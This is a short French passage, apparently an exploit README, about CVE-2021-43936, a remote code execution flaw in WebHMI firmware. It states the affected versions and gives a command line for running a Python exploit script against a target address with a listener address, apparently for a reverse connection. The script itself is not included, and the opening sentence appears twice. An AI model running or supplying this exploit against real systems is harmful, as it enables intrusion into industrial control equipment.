
CVE-2021-43936 est une vulnérabilité critique (CVSS3 10.0) conduisant à une exécution de code à distance (RCE) dans le firmware WebHMI.
CVE-2021-43936 est une vulnérabilité critique (CVSS3 10.0) entraînant une exécution de code à distance (RCE) dans le firmware WebHMI.
Cette vulnérabilité affecte les versions 4.0 et les plus récentes.
Testée uniquement sur la version 4.0.7475. La vulnérabilité est exploitée par le script comme suit :
L'exploit peut échouer si plusieurs NIC sont attachés. La solution est de réessayer.
python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80
